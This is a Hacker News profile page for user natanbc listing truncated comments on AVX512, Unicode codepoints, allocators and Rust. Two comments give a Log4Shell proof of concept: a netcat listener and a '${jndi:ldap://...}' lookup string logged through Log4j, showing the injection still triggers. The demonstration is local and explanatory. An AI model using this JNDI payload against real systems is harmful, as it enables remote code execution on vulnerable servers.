Live data from Hacker News

Viewing profile — natanbc

natanbc

HN member
Joined
Tue, Sep 15, 2020, 2:56 PM UTC
HN karma
178
Public activity
8 items

About natanbc

No profile information was provided.

Recent public activity

  1. comment
    Comment #34277654

    Only on older CPUs, they started fusing off AVX512 on newer silicon batches (even on 12th gen)

  2. comment
    Comment #34275468

    Only in codepoints, but it still has the problem GP mentions of ` + e = è being two codepoints (so two elements in UCS-32), but being logically one character https://manishearth.gi…

  3. comment
    Comment #29506508

    I posted this in reply to a sibling comment, but the "correct" way is still vulnerable Start nc (nc -lp 1234) and run this org.apache.logging.log4j.LogManager.getLogger("whatever")…

  4. comment
    Comment #29506397

    The RCE works with both ways, start nc (nc -lp 1234) and run this org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}"…

  5. comment
    Comment #29320735

    > In a multithreaded program, a bump allocator requires locks. That kills their performance advantage. Java uses per-thread pointer bump allocators[1] > While Java does it as well,…

  6. story
  7. story
  8. comment
    Comment #27599918

    It does for multi-codepoint characters (such as the rainbow flag): https://play.rust-lang.org/?version=stable&mode=debug&editio... Elixir gets it right: https://replit.com/@natanbc…